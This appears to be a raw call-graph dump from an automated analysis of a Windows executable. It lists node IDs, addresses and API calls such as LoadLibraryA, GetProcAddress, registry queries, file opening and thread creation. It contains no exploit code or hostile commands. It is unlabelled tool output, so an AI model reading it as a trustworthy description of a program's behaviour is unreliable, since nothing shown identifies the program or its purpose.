101878->101880 101879->101875 101880->101849 101881->101864 101882->101864 101883->101858 101884->101849 102075 514bb5 101885->102075 101890 54d8e6 101892 514e4a 84 API calls 101890->101892 101891 514e08 LoadLibraryExW 102085 514b6a 101891->102085 101894 54d8ed 101892->101894 101896 514b6a 3 API calls 101894->101896 101899 54d8f5 101896->101899 101898 514e2f 101898->101899 101900 514e3b 101898->101900 102111 514f0b 101899->102111 101901 514e4a 84 API calls 101900->101901 101903 514e40 101901->101903 101903->101466 101903->101469 101906 54d91c 102119 514ec7 101906->102119 101910 517667 59 API calls 101909->101910 101911 5145b1 101910->101911 101912 517667 59 API calls 101911->101912 101913 5145b9 101912->101913 101914 517667 59 API calls 101913->101914 101915 5145c1 101914->101915 101916 517667 59 API calls 101915->101916 101917 5145c9 101916->101917 101918 54d4d2 101917->101918 101919 5145fd 101917->101919 101920 518047 59 API calls 101918->101920 101921 51784b 59 API calls 101919->101921 101922 54d4db 101920->101922 101923 51460b 101921->101923 102301 517d8c 101922->102301 101925 517d2c 59 API calls 101923->101925 101926 514615 101925->101926 101928 514640 101926->101928 101929 51784b 59 API calls 101926->101929 101927 514680 102288 51784b 101927->102288 101928->101927 101931 51465f 101928->101931 101941 54d4fb 101928->101941 101932 514636 101929->101932 101935 5179f2 59 API calls 101931->101935 101934 517d2c 59 API calls 101932->101934 101933 54d5cb 101937 517bcc 59 API calls 101933->101937 101934->101928 101938 514669 101935->101938 101936 514691 101939 5146a3 101936->101939 101942 518047 59 API calls 101936->101942 101949 54d588 101937->101949 101938->101927 101946 51784b 59 API calls 101938->101946 101940 5146b3 101939->101940 101943 518047 59 API calls 101939->101943 101945 5146ba 101940->101945 101947 518047 59 API calls 101940->101947 101941->101933 101944 54d5b4 101941->101944 101957 54d532 101941->101957 101942->101939 101943->101940 101944->101933 101952 54d59f 101944->101952 101948 518047 59 API calls 101945->101948 101950 5146c1 Mailbox 101945->101950 101946->101927 101947->101945 101948->101950 101949->101927 101951 5179f2 59 API calls 101949->101951 102305 517924 59 API calls 2 library calls 101949->102305 101950->101497 101951->101949 101955 517bcc 59 API calls 101952->101955 101953 54d590 101954 517bcc 59 API calls 101953->101954 101954->101949 101955->101949 101957->101953 101958 54d57b 101957->101958 101959 517bcc 59 API calls 101958->101959 101959->101949 101961 517e4f 59 API calls 101960->101961 101962 5179fd 101961->101962 101962->101503 101962->101506 101964 57408d 101963->101964 101965 574092 101964->101965 101966 5740a0 101964->101966 101967 518047 59 API calls 101965->101967 101968 517667 59 API calls 101966->101968 102016 57409b Mailbox 101967->102016 101969 5740a8 101968->101969 101970 517667 59 API calls 101969->101970 101971 5740b0 101970->101971 101972 517667 59 API calls 101971->101972 101973 5740bb 101972->101973 101974 517667 59 API calls 101973->101974 101975 5740c3 101974->101975 101976 517667 59 API calls 101975->101976 101977 5740cb 101976->101977 101978 517667 59 API calls 101977->101978 101979 5740d3 101978->101979 101980 517667 59 API calls 101979->101980 101981 5740db 101980->101981 101982 517667 59 API calls 101981->101982 101983 5740e3 101982->101983 101984 51459b 59 API calls 101983->101984 101985 5740fa 101984->101985 101986 51459b 59 API calls 101985->101986 101987 574113 101986->101987 101988 5179f2 59 API calls 101987->101988 101989 57411f 101988->101989 101990 574132 101989->101990 101991 517d2c 59 API calls 101989->101991 101992 5179f2 59 API calls 101990->101992 101991->101990 101993 57413b 101992->101993 101994 57414b 101993->101994 101995 517d2c 59 API calls 101993->101995 101996 518047 59 API calls 101994->101996 101995->101994 101997 574157 101996->101997 101998 517b2e 59 API calls 101997->101998 101999 574163 101998->101999 102307 574223 59 API calls 101999->102307 102001 574172 102308 574223 59 API calls 102001->102308 102003 574185 102004 5179f2 59 API calls 102003->102004 102016->101521 102018 579162 __write_nolock 102017->102018 102019 530db6 Mailbox 59 API calls 102018->102019 102020 5791bf 102019->102020 102021 51522e 59 API calls 102020->102021 102022 5791c9 102021->102022 102023 578f5f GetSystemTimeAsFileTime 102022->102023 102024 5791d4 102023->102024 102025 514ee5 85 API calls 102024->102025 102026 5791e7 _wcscmp 102025->102026 102027 57920b 102026->102027 102028 5792b8 102026->102028 102326 579734 102027->102326 102030 579734 96 API calls 102028->102030 102045 579284 _wcscat 102030->102045 102033 514f0b 74 API calls 102035 5792dd 102033->102035 102034 5792c1 102034->101527 102036 514f0b 74 API calls 102035->102036 102038 5792ed 102036->102038 102037 579239 _wcscat _wcscpy 102333 5340fb 58 API calls __wsplitpath_helper 102037->102333 102039 514f0b 74 API calls 102038->102039 102041 579308 102039->102041 102042 514f0b 74 API calls 102041->102042 102043 579318 102042->102043 102044 514f0b 74 API calls 102043->102044 102046 579333 102044->102046 102045->102033 102045->102034 102047 514f0b 74 API calls 102046->102047 102048 579343 102047->102048 102049 514f0b 74 API calls 102048->102049 102050 579353 102049->102050 102051 514f0b 74 API calls 102050->102051 102052 579363 102051->102052 102072->101454 102073->101490 102074->101504 102124 514c03 102075->102124 102078 514bdc 102080 514bf5 102078->102080 102081 514bec FreeLibrary 102078->102081 102079 514c03 2 API calls 102079->102078 102082 53525b 102080->102082 102081->102080 102128 535270 102082->102128 102084 514dfc 102084->101890 102084->101891 102209 514c36 102085->102209 102088 514b8f 102089 514ba1 FreeLibrary 102088->102089 102090 514baa 102088->102090 102089->102090 102092 514c70 102090->102092 102091 514c36 2 API calls 102091->102088 102093 530db6 Mailbox 59 API calls 102092->102093 102094 514c85 102093->102094 102213 51522e 102094->102213 102096 514c91 _memmove 102097 514ccc 102096->102097 102098 514dc1 102096->102098 102099 514d89 102096->102099 102100 514ec7 69 API calls 102097->102100 102227 57991b 95 API calls 102098->102227 102216 514e89 CreateStreamOnHGlobal 102099->102216 102107 514cd5 102100->102107 102103 514f0b 74 API calls 102103->102107 102104 514d69 102104->101898 102106 54d8a7 102108 514ee5 85 API calls 102106->102108 102107->102103 102107->102104 102107->102106 102222 514ee5 102107->102222 102109 54d8bb 102108->102109 102110 514f0b 74 API calls 102109->102110 102110->102104 102112 54d9cd 102111->102112 102113 514f1d 102111->102113 102245 5355e2 102113->102245 102116 579109 102265 578f5f 102116->102265 102118 57911f 102118->101906 102120 54d990 102119->102120 102121 514ed6 102119->102121 102270 535c60 102121->102270 102123 514ede 102125 514bd0 102124->102125 102126 514c0c LoadLibraryA 102124->102126 102125->102078 102125->102079 102126->102125 102127 514c1d GetProcAddress 102126->102127 102127->102125 102131 53527c __alloc_osfhnd 102128->102131 102129 53528f 102177 538b28 58 API calls __getptd_noexit 102129->102177 102131->102129 102133 5352c0 102131->102133 102132 535294 102178 538db6 9 API calls __mbschr_l 102132->102178 102147 5404e8 102133->102147 102136 5352c5 102137 5352db 102136->102137 102138 5352ce 102136->102138 102140 535305 102137->102140 102141 5352e5 102137->102141 102179 538b28 58 API calls __getptd_noexit 102138->102179 102162 540607 102140->102162 102180 538b28 58 API calls __getptd_noexit 102141->102180 102144 53529f __alloc_osfhnd @_EH4_CallFilterFunc@8 102144->102084 102148 5404f4 __alloc_osfhnd 102147->102148 102149 539c0b __lock 58 API calls 102148->102149 102160 540502 102149->102160 102150 54057d 102187 53881d 58 API calls 2 library calls 102150->102187 102153 5405f3 __alloc_osfhnd 102153->102136 102154 540584 102159 540576 102154->102159 102188 539e2b InitializeCriticalSectionAndSpinCount 102154->102188 102155 539c93 __mtinitlocknum 58 API calls 102155->102160 102158 5405aa EnterCriticalSection 102158->102159 102182 5405fe 102159->102182 102160->102150 102160->102155 102160->102159 102185 536c50 59 API calls __lock 102160->102185 102186 536cba LeaveCriticalSection LeaveCriticalSection _doexit 102160->102186 102163 540627 __wopenfile 102162->102163 102164 540641 102163->102164 102176 5407fc 102163->102176 102195 5337cb 60 API calls 2 library calls 102163->102195 102193 538b28 58 API calls __getptd_noexit 102164->102193 102166 540646 102194 538db6 9 API calls __mbschr_l 102166->102194 102168 535310 102181 535332 LeaveCriticalSection LeaveCriticalSection __wfsopen 102168->102181 102169 54085f 102190 5485a1 102169->102190 102172 5407f5 102172->102176 102196 5337cb 60 API calls 2 library calls 102172->102196 102174 540814 102174->102176 102197 5337cb 60 API calls 2 library calls 102174->102197 102176->102164 102176->102169 102177->102132 102178->102144 102179->102144 102180->102144 102181->102144 102189 539d75 LeaveCriticalSection 102182->102189 102184 540605 102184->102153 102185->102160 102186->102160 102187->102154 102188->102158 102189->102184 102198 547d85 102190->102198 102192 5485ba 102192->102168 102193->102166 102194->102168 102195->102172 102196->102174 102197->102176 102199 547d91 __alloc_osfhnd 102198->102199 102200 547da7 102199->102200 102203 547ddd 102199->102203 102201 538b28 __mbschr_l 58 API calls 102200->102201 102202 547dac 102201->102202 102204 538db6 __mbschr_l 9 API calls 102202->102204 102205 547e4e __wsopen_nolock 109 API calls 102203->102205 102208 547db6 __alloc_osfhnd 102204->102208 102206 547df9 102205->102206 102207 547e22 __wsopen_helper LeaveCriticalSection 102206->102207 102207->102208 102208->102192 102210 514b83 102209->102210 102211 514c3f LoadLibraryA 102209->102211 102210->102088 102210->102091 102211->102210 102212 514c50 GetProcAddress 102211->102212 102212->102210 102214 530db6 Mailbox 59 API calls 102213->102214 102215 515240 102214->102215 102215->102096 102217 514ea3 FindResourceExW 102216->102217 102221 514ec0 102216->102221 102218 54d933 LoadResource 102217->102218 102217->102221 102219 54d948 SizeofResource 102218->102219 102218->102221 102220 54d95c LockResource 102219->102220 102219->102221 102220->102221 102221->102097 102223 514ef4 102222->102223 102226 54d9ab 102222->102226 102228 53584d 102223->102228 102225 514f02 102225->102107 102227->102097 102229 535859 __alloc_osfhnd 102228->102229 102230 53586b 102229->102230 102231 535891 102229->102231 102241 538b28 58 API calls __getptd_noexit 102230->102241 102234 536c11 __lock_file 59 API calls 102231->102234 102233 535870 102242 538db6 9 API calls __mbschr_l 102233->102242 102236 535897 102234->102236 102243 5357be 83 API calls 5 library calls 102236->102243 102238 53587b __alloc_osfhnd 102238->102225 102239 5358a6 102244 5358c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 102239->102244 102241->102233 102242->102238 102243->102239 102244->102238 102248 5355fd 102245->102248 102247 514f2e 102247->102116 102249 535609 __alloc_osfhnd 102248->102249 102250 53564c 102249->102250 102251 535644 __alloc_osfhnd 102249->102251 102255 53561f _memset 102249->102255 102252 536c11 __lock_file 59 API calls 102250->102252 102251->102247 102254 535652 102252->102254 102263 53541d 72 API calls 6 library calls 102254->102263 102261 538b28 58 API calls __getptd_noexit 102255->102261 102256 535639 102262 538db6 9 API calls __mbschr_l 102256->102262 102259 535668 102264 535686 LeaveCriticalSection LeaveCriticalSection __wfsopen 102259->102264 102261->102256 102262->102251 102263->102259 102264->102251 102268 53520a GetSystemTimeAsFileTime 102265->102268 102267 578f6e 102267->102118 102269 535238 __aulldiv 102268->102269 102269->102267 102271 535c6c __alloc_osfhnd 102270->102271 102272 535c93 102271->102272 102273 535c7e 102271->102273 102275 536c11 __lock_file 59 API calls 102272->102275 102284 538b28 58 API calls __getptd_noexit 102273->102284 102277 535c99 102275->102277 102276 535c83 102285 538db6 9 API calls __mbschr_l 102276->102285 102286 5358d0 67 API calls 6 library calls 102277->102286 102280 535c8e __alloc_osfhnd 102280->102123 102281 535ca4 102287 535cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 102281->102287 102283 535cb6 102283->102280 102284->102276 102285->102280 102286->102281 102287->102283 102289 5178b7 102288->102289 102290 51785a 102288->102290 102292 517d2c 59 API calls 102289->102292 102290->102289 102291 517865 102290->102291 102293 517880 102291->102293 102294 54eb09 102291->102294 102298 517888 _memmove 102292->102298 102306 517f27 59 API calls Mailbox 102293->102306 102296 518029 59 API calls 102294->102296 102297 54eb13 102296->102297 102299 530db6 Mailbox 59 API calls 102297->102299 102298->101936 102300 54eb33 102299->102300 102302 517da6 102301->102302 102303 517d99 102301->102303 102304 530db6 Mailbox 59 API calls 102302->102304 102303->101928 102304->102303 102305->101949 102306->102298 102307->102001 102308->102003 102331 579748 __tzset_nolock _wcscmp 102326->102331 102327 514f0b 74 API calls 102327->102331 102328 579210 102328->102034 102332 5340fb 58 API calls __wsplitpath_helper 102328->102332 102329 579109 GetSystemTimeAsFileTime 102329->102331 102330 514ee5 85 API calls 102330->102331 102331->102327 102331->102328 102331->102329 102331->102330 102332->102037 102333->102045 102353->101563 102354->101535 102355->101550 102356->101545 102357->101551 102358->101561 102359->101564 102360->101568 102361->101309 102362->101308 102363->101172 102365 51b91a 102364->102365 102368 51bac7 102364->102368 102366 51bf81 102365->102366 102365->102368 102369 51b9fc 102365->102369 102375 51baab 102365->102375 102366->102375 102389 5194dc 59 API calls wcstoxq 102366->102389 102368->102366 102371 51bb46 102368->102371 102368->102375 102377 51ba8b Mailbox 102368->102377 102369->102371 102373 51ba38 102369->102373 102369->102375 102372 551361 102371->102372 102371->102375 102371->102377 102386 566e8f 59 API calls 102371->102386 102372->102375 102387 533d46 59 API calls __wtof_l 102372->102387 102373->102375 102373->102377 102379 5511b4 102373->102379 102375->101202 102377->101202 102377->102372 102377->102375 102388 518cd4 59 API calls Mailbox 102377->102388 102379->102375 102385 533d46 59 API calls __wtof_l 102379->102385 102380->101202 102381->101197 102382->101196 102383->101190 102384->101196 102385->102379 102386->102377 102387->102375 102388->102377 102389->102375 102390->101211 102391->101235 102392 511055 102397 512649 102392->102397 102395 532d40 __cinit 67 API calls 102396 511064 102395->102396 102398 517667 59 API calls 102397->102398 102399 5126b7 102398->102399 102404 513582 102399->102404 102402 512754 102403 51105a 102402->102403 102407 513416 59 API calls 2 library calls 102402->102407 102403->102395 102408 5135b0 102404->102408 102407->102402 102409 5135bd 102408->102409 102410 5135a1 102408->102410 102409->102410 102411 5135c4 RegOpenKeyExW 102409->102411 102410->102402 102411->102410 102412 5135de RegQueryValueExW 102411->102412 102413 513614 RegCloseKey 102412->102413 102414 5135ff 102412->102414 102413->102410 102414->102413 102415 537c56 102416 537c62 __alloc_osfhnd 102415->102416 102452 539e08 GetStartupInfoW 102416->102452 102418 537c67 102454 538b7c GetProcessHeap 102418->102454 102420 537cbf 102421 537cca 102420->102421 102537 537da6 58 API calls 3 library calls 102420->102537 102455 539ae6 102421->102455 102424 537cd0 102425 537cdb __RTC_Initialize 102424->102425 102538 537da6 58 API calls 3 library calls 102424->102538 102476 53d5d2 102425->102476 102428 537cea 102429 537cf6 GetCommandLineW 102428->102429 102539 537da6 58 API calls 3 library calls 102428->102539 102495 544f23 GetEnvironmentStringsW 102429->102495 102432 537cf5 102432->102429 102435 537d10 102436 537d1b 102435->102436 102540 5330b5 58 API calls 3 library calls 102435->102540 102505 544d58 102436->102505 102439 537d21 102440 537d2c 102439->102440 102541 5330b5 58 API calls 3 library calls 102439->102541 102519 5330ef 102440->102519 102443 537d34 102444 537d3f __wwincmdln 102443->102444 102542 5330b5 58 API calls 3 library calls 102443->102542 102525 5147d0 102444->102525 102447 537d53 102448 537d62 102447->102448 102543 533358 58 API calls _doexit 102447->102543 102544 5330e0 58 API calls _doexit 102448->102544 102451 537d67 __alloc_osfhnd 102453 539e1e 102452->102453 102453->102418 102454->102420 102545 533187 36 API calls 2 library calls 102455->102545 102457 539aeb 102546 539d3c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 102457->102546 102459 539af0 102460 539af4 102459->102460 102548 539d8a TlsAlloc 102459->102548 102547 539b5c 61 API calls 2 library calls 102460->102547 102463 539b06 102463->102460 102465 539b11 102463->102465 102464 539af9 102464->102424 102549 5387d5 102465->102549 102468 539b53 102557 539b5c 61 API calls 2 library calls 102468->102557 102471 539b32 102471->102468 102473 539b38 102471->102473 102472 539b58 102472->102424 102556 539a33 58 API calls 4 library calls 102473->102556 102475 539b40 GetCurrentThreadId 102475->102424 102477 53d5de __alloc_osfhnd 102476->102477 102478 539c0b __lock 58 API calls 102477->102478 102479 53d5e5 102478->102479 102480 5387d5 __calloc_crt 58 API calls 102479->102480 102482 53d5f6 102480->102482 102481 53d661 GetStartupInfoW 102489 53d676 102481->102489 102490 53d7a5 102481->102490 102482->102481 102483 53d601 __alloc_osfhnd @_EH4_CallFilterFunc@8 102482->102483 102483->102428 102484 53d86d 102571 53d87d LeaveCriticalSection _doexit 102484->102571 102486 5387d5 __calloc_crt 58 API calls 102486->102489 102487 53d7f2 GetStdHandle 102487->102490 102488 53d805 GetFileType 102488->102490 102489->102486 102489->102490 102491 53d6c4 102489->102491 102490->102484 102490->102487 102490->102488 102570 539e2b InitializeCriticalSectionAndSpinCount 102490->102570 102491->102490 102492 53d6f8 GetFileType 102491->102492 102569 539e2b InitializeCriticalSectionAndSpinCount 102491->102569 102492->102491 102496 544f34 102495->102496 102497 537d06 102495->102497 102572 53881d 58 API calls 2 library calls 102496->102572 102501 544b1b GetModuleFileNameW 102497->102501 102499 544f5a _memmove 102500 544f70 FreeEnvironmentStringsW 102499->102500 102500->102497 102502 544b4f _wparse_cmdline 102501->102502 102504 544b8f _wparse_cmdline 102502->102504 102573 53881d 58 API calls 2 library calls 102502->102573 102504->102435 102506 544d71 __NMSG_WRITE 102505->102506 102507 544d69 102505->102507 102508 5387d5 __calloc_crt 58 API calls 102506->102508 102507->102439 102512 544d9a __NMSG_WRITE 102508->102512 102509 544df1 102510 532d55 _free 58 API calls 102509->102510 102510->102507 102511 5387d5 __calloc_crt 58 API calls 102511->102512 102512->102507 102512->102509 102512->102511 102513 544e16 102512->102513 102516 544e2d 102512->102516 102574 544607 58 API calls __mbschr_l 102512->102574 102514 532d55 _free 58 API calls 102513->102514 102514->102507 102575 538dc6 IsProcessorFeaturePresent 102516->102575 102518 544e39 102518->102439 102520 5330fb __IsNonwritableInCurrentImage 102519->102520 102590 53a4d1 102520->102590 102522 533119 __initterm_e 102523 532d40 __cinit 67 API calls 102522->102523 102524 533138 __cinit __IsNonwritableInCurrentImage 102522->102524 102523->102524 102524->102443 102526 5147ea 102525->102526 102536 514889 102525->102536 102527 514824 IsThemeActive 102526->102527 102593 53336c 102527->102593 102531 514850 102605 5148fd SystemParametersInfoW SystemParametersInfoW 102531->102605 102533 51485c 102606 513b3a 102533->102606 102535 514864 SystemParametersInfoW 102535->102536 102536->102447 102537->102421 102538->102425 102539->102432 102543->102448 102544->102451 102545->102457 102546->102459 102547->102464 102548->102463 102550 5387dc 102549->102550 102552 538817 102550->102552 102554 5387fa 102550->102554 102558 5451f6 102550->102558 102552->102468 102555 539de6 TlsSetValue 102552->102555 102554->102550 102554->102552 102566 53a132 Sleep 102554->102566 102555->102471 102556->102475 102557->102472 102559 545201 102558->102559 102564 54521c 102558->102564 102560 54520d 102559->102560 102559->102564 102567 538b28 58 API calls __getptd_noexit 102560->102567 102562 54522c HeapAlloc 102563 545212 102562->102563 102562->102564 102563->102550 102564->102562 102564->102563 102568 5333a1 DecodePointer 102564->102568 102566->102554 102567->102563 102568->102564 102569->102491 102570->102490 102571->102483 102572->102499 102573->102504 102574->102512 102576 538dd1 102575->102576 102581 538c59 102576->102581 102580 538dec 102580->102518 102582 538c73 _memset ___raise_securityfailure 102581->102582 102583 538c93 IsDebuggerPresent 102582->102583 102589 53a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 102583->102589 102585 53c5f6 ___strgtold12_l 6 API calls 102587 538d7a 102585->102587 102586 538d57 ___raise_securityfailure 102586->102585 102588 53a140 GetCurrentProcess TerminateProcess 102587->102588 102588->102580 102589->102586 102591 53a4d4 EncodePointer 102590->102591 102591->102591 102592 53a4ee 102591->102592 102592->102522 102594 539c0b __lock 58 API calls 102593->102594 102595 533377 DecodePointer EncodePointer 102594->102595 102658 539d75 LeaveCriticalSection 102595->102658 102597 514849 102598 5333d4 102597->102598 102599 5333f8 102598->102599 102600 5333de 102598->102600 102599->102531 102600->102599 102659 538b28 58 API calls __getptd_noexit 102600->102659 102602 5333e8 102660 538db6 9 API calls __mbschr_l 102602->102660 102604 5333f3 102604->102531 102605->102533 102607 513b47 __write_nolock 102606->102607 102608 517667 59 API calls 102607->102608 102609 513b51 GetCurrentDirectoryW 102608->102609 102661 513766 102609->102661 102611 513b7a IsDebuggerPresent 102612 54d272 MessageBoxA 102611->102612 102613 513b88 102611->102613 102615 54d28c 102612->102615 102613->102615 102616 513ba5 102613->102616 102645 513c61 102613->102645 102614 513c68 SetCurrentDirectoryW 102617 513c75 Mailbox 102614->102617 102783 517213 59 API calls Mailbox 102615->102783 102742 517285 102616->102742 102617->102535 102620 54d29c 102625 54d2b2 SetCurrentDirectoryW 102620->102625 102625->102617 102645->102614 102658->102597 102659->102602 102660->102604 102662 517667 59 API calls 102661->102662 102663 51377c 102662->102663 102792 513d31 102663->102792 102665 51379a 102666 514706 61 API calls 102665->102666 102667 5137ae 102666->102667 102668 517de1 59 API calls 102667->102668 102669 5137bb 102668->102669 102670 514ddd 136 API calls 102669->102670 102671 5137d4 102670->102671 102672 54d173 102671->102672 102673 5137dc Mailbox 102671->102673 102845 57955b 102672->102845 102677 518047 59 API calls 102673->102677 102676 54d192 102679 532d55 _free 58 API calls 102676->102679 102680 5137ef 102677->102680 102678 514e4a 84 API calls 102678->102676 102681 54d19f 102679->102681 102806 51928a 102680->102806 102683 514e4a 84 API calls 102681->102683 102685 54d1a8 102683->102685 102689 513ed0 59 API calls 102685->102689 102686 517de1 59 API calls 102687 513808 102686->102687 102688 5184c0 69 API calls 102687->102688 102690 51381a Mailbox 102688->102690 102691 54d1c3 102689->102691 102692 517de1 59 API calls 102690->102692 102693 513ed0 59 API calls 102691->102693 102694 513840 102692->102694 102695 54d1df 102693->102695 102696 5184c0 69 API calls 102694->102696 102697 514706 61 API calls 102695->102697 102699 51384f Mailbox 102696->102699 102698 54d204 102697->102698 102700 513ed0 59 API calls 102698->102700 102702 517667 59 API calls 102699->102702 102701 54d210 102700->102701 102703 518047 59 API calls 102701->102703 102704 51386d 102702->102704 102705 54d21e 102703->102705 102809 513ed0 102704->102809 102707 513ed0 59 API calls 102705->102707 102709 54d22d 102707->102709 102715 518047 59 API calls 102709->102715 102711 513887 102711->102685 102712 513891 102711->102712 102713 532efd _W_store_winword 60 API calls 102712->102713 102714 51389c 102713->102714 102714->102691 102716 5138a6 102714->102716 102717 54d24f 102715->102717 102718 532efd _W_store_winword 60 API calls 102716->102718 102719 513ed0 59 API calls 102717->102719 102720 5138b1 102718->102720 102721 54d25c 102719->102721 102720->102695 102722 5138bb 102720->102722 102721->102721 102723 532efd _W_store_winword 60 API calls 102722->102723 102724 5138c6 102723->102724 102724->102709 102725 513907 102724->102725 102727 513ed0 59 API calls 102724->102727 102725->102709 102726 513914 102725->102726 102825 5192ce 102726->102825 102729 5138ea 102727->102729 102731 518047 59 API calls 102729->102731 102733 5138f8 102731->102733 102735 513ed0 59 API calls 102733->102735 102735->102725 102737 51928a 59 API calls 102739 51394f 102737->102739 102738 518ee0 60 API calls 102738->102739 102739->102737 102739->102738 102740 513ed0 59 API calls 102739->102740 102741 513995 Mailbox 102739->102741 102740->102739 102741->102611 102743 517292 __write_nolock 102742->102743 102744 54ea22 _memset 102743->102744 102745 5172ab 102743->102745 102747 54ea3e GetOpenFileNameW 102744->102747 102900 514750 102745->102900 102749 54ea8d 102747->102749 102751 517bcc 59 API calls 102749->102751 102753 54eaa2 102751->102753 102753->102753 102755 5172c9 102928 51686a 102755->102928 102783->102620 102793 513d3e __write_nolock 102792->102793 102794 517bcc 59 API calls 102793->102794 102798 513ea4 Mailbox 102793->102798 102796 513d70 102794->102796 102795 5179f2 59 API calls 102795->102796 102796->102795 102804 513da6 Mailbox 102796->102804 102797 513e77 102797->102798 102799 517de1 59 API calls 102797->102799 102798->102665 102800 513e98 102799->102800 102802 513f74 59 API calls 102800->102802 102801 517de1 59 API calls 102801->102804 102802->102798 102804->102797 102804->102798 102804->102801 102805 5179f2 59 API calls 102804->102805 102880 513f74 102804->102880 102805->102804 102807 530db6 Mailbox 59 API calls 102806->102807 102808 5137fb 102807->102808 102808->102686 102810 513ef3 102809->102810 102811 513eda 102809->102811 102813 517bcc 59 API calls 102810->102813 102812 518047 59 API calls 102811->102812 102814 513879 102812->102814 102813->102814 102815 532efd 102814->102815 102816 532f09 102815->102816 102817 532f7e 102815->102817 102821 532f2e 102816->102821 102886 538b28 58 API calls __getptd_noexit 102816->102886 102888 532f90 60 API calls 3 library calls 102817->102888 102820 532f8b 102820->102711 102821->102711 102822 532f15 102887 538db6 9 API calls __mbschr_l 102822->102887 102824 532f20 102824->102711 102826 5192d6 102825->102826 102827 530db6 Mailbox 59 API calls 102826->102827 102828 5192e4 102827->102828 102829 513924 102828->102829 102889 5191fc 59 API calls Mailbox 102828->102889 102831 519050 102829->102831 102890 519160 102831->102890 102833 51905f 102834 530db6 Mailbox 59 API calls 102833->102834 102835 513932 102833->102835 102834->102835 102836 518ee0 102835->102836 102837 54f17c 102836->102837 102839 518ef7 102836->102839 102837->102839 102898 518bdb 59 API calls Mailbox 102837->102898 102840 519040 102839->102840 102841 518ff8 102839->102841 102844 518fff 102839->102844 102842 519d3c 60 API calls 102840->102842 102843 530db6 Mailbox 59 API calls 102841->102843 102842->102844 102843->102844 102844->102739 102846 514ee5 85 API calls 102845->102846 102847 5795ca 102846->102847 102848 579734 96 API calls 102847->102848 102849 5795dc 102848->102849 102850 514f0b 74 API calls 102849->102850 102878 54d186 102849->102878 102851 5795f7 102850->102851 102852 514f0b 74 API calls 102851->102852 102853 579607 102852->102853 102854 514f0b 74 API calls 102853->102854 102855 579622 102854->102855 102856 514f0b 74 API calls 102855->102856 102857 57963d 102856->102857 102858 514ee5 85 API calls 102857->102858 102859 579654 102858->102859 102860 53571c __crtCompareStringA_stat 58 API calls 102859->102860 102861 57965b 102860->102861 102862 53571c __crtCompareStringA_stat 58 API calls 102861->102862 102863 579665 102862->102863 102864 514f0b 74 API calls 102863->102864 102865 579679 102864->102865 102866 579109 GetSystemTimeAsFileTime 102865->102866 102867 57968c 102866->102867 102868 5796b6 102867->102868 102869 5796a1 102867->102869 102870 5796bc 102868->102870 102871 57971b 102868->102871 102872 532d55 _free 58 API calls 102869->102872 102899 578b06 116 API calls __fcloseall 102870->102899 102874 532d55 _free 58 API calls 102871->102874 102875 5796a7 102872->102875 102874->102878 102876 532d55 _free 58 API calls 102875->102876 102876->102878 102877 579713 102879 532d55 _free 58 API calls 102877->102879 102878->102676 102878->102678 102879->102878 102881 513f82 102880->102881 102885 513fa4 _memmove 102880->102885 102883 530db6 Mailbox 59 API calls 102881->102883 102882 530db6 Mailbox 59 API calls 102884 513fb8 102882->102884 102883->102885 102884->102804 102885->102882 102886->102822 102887->102824 102888->102820 102889->102829 102891 519169 Mailbox 102890->102891 102892 54f19f 102891->102892 102897 519173 102891->102897 102893 530db6 Mailbox 59 API calls 102892->102893 102895 54f1ab 102893->102895 102894 51917a 102894->102833 102896 519c90 Mailbox 59 API calls 102896->102897 102897->102894 102897->102896 102898->102839 102899->102877 102962 541940 102900->102962 102903 514799 102906 517d8c 59 API calls 102903->102906 102904 51477c 102905 517bcc 59 API calls 102904->102905 102907 514788 102905->102907 102906->102907 102964 517726 102907->102964 102910 530791 102911 541940 __write_nolock 102910->102911 102912 53079e GetLongPathNameW 102911->102912 102913 517bcc 59 API calls 102912->102913 102914 5172bd 102913->102914 102915 51700b 102914->102915 102916 517667 59 API calls 102915->102916 102917 51701d 102916->102917 102918 514750 60 API calls 102917->102918 102919 517028 102918->102919 102920 54e885 102919->102920 102921 517033 102919->102921 102926 54e89f 102920->102926 102974 517908 61 API calls 102920->102974 102922 513f74 59 API calls 102921->102922 102924 51703f 102922->102924 102968 5134c2 102924->102968 102927 517052 Mailbox 102927->102755 102929 514ddd 136 API calls 102928->102929 102930 51688f 102929->102930 102931 54e031 102930->102931 102932 514ddd 136 API calls 102930->102932 102963 51475d GetFullPathNameW 102962->102963 102963->102903 102963->102904 102965 517734 102964->102965 102966 517d2c 59 API calls 102965->102966 102967 514794 102966->102967 102967->102910 102969 5134d4 102968->102969 102973 5134f3 _memmove 102968->102973 102971 530db6 Mailbox 59 API calls 102969->102971 102970 530db6 Mailbox 59 API calls 102972 51350a 102970->102972 102971->102973 102972->102927 102973->102970 102974->102920 103127 511066 103132 51f76f 103127->103132 103129 51106c 103130 532d40 __cinit 67 API calls 103129->103130 103131 511076 103130->103131 103133 51f790 103132->103133 103165 52ff03 103133->103165 103137 51f7d7 103138 517667 59 API calls 103137->103138 103139 51f7e1 103138->103139 103140 517667 59 API calls 103139->103140 103141 51f7eb 103140->103141 103142 517667 59 API calls 103141->103142 103143 51f7f5 103142->103143 103144 517667 59 API calls 103143->103144 103145 51f833 103144->103145 103146 517667 59 API calls 103145->103146 103147 51f8fe 103146->103147 103175 525f87 103147->103175 103151 51f930 103152 517667 59 API calls 103151->103152 103153 51f93a 103152->103153 103203 52fd9e 103153->103203 103155 51f981 103156 51f991 GetStdHandle 103155->103156 103157 51f9dd 103156->103157 103158 5545ab 103156->103158 103159 51f9e5 OleInitialize 103157->103159 103158->103157 103160 5545b4 103158->103160 103159->103129 103210 576b38 64 API calls Mailbox 103160->103210 103162 5545bb 103211 577207 CreateThread 103162->103211 103164 5545c7 CloseHandle 103164->103159 103212 52ffdc 103165->103212 103168 52ffdc 59 API calls 103169 52ff45 103168->103169 103170 517667 59 API calls 103169->103170 103171 52ff51 103170->103171 103172 517bcc 59 API calls 103171->103172 103173 51f796 103172->103173 103174 530162 6 API calls 103173->103174 103174->103137 103176 517667 59 API calls 103175->103176 103177 525f97 103176->103177 103178 517667 59 API calls 103177->103178 103179 525f9f 103178->103179 103219 525a9d 103179->103219 103182 525a9d 59 API calls 103183 525faf 103182->103183 103184 517667 59 API calls 103183->103184 103185 525fba 103184->103185 103186 530db6 Mailbox 59 API calls 103185->103186 103187 51f908 103186->103187 103188 5260f9 103187->103188 103189 526107 103188->103189 103190 517667 59 API calls 103189->103190 103191 526112 